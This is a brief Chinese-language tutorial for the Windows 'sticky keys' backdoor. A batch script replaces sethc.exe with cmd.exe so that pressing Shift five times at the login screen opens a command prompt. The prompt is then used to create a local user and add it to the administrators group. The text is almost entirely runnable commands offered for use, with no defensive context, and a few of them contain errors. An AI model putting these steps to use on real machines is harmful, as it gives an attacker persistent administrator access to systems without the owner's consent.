shift后门

1，写入一个bat文件并运行（管理员权限运行）

内容：

@echo off

 

c:

 

cd\

 

cd Windows\System32

 

takeown /f sethc.exe /a

 

icacls sethc.exe /grant Administrator:f

 

del sethc.exe

 

copy cmd.exe sethc.exe

 

pause&&exit

 

 

2，退回登录界面后点击5次shift

 

3，出现cmd窗口，添加用户，通过当前用户登录进去

 

4，命令：（后面两条命令就不演示了）

net user test 1qaz2wsx.. /add       （添加用户）

net localgroup addministrators test /add       (提权)

net user test /active :yes    (激活)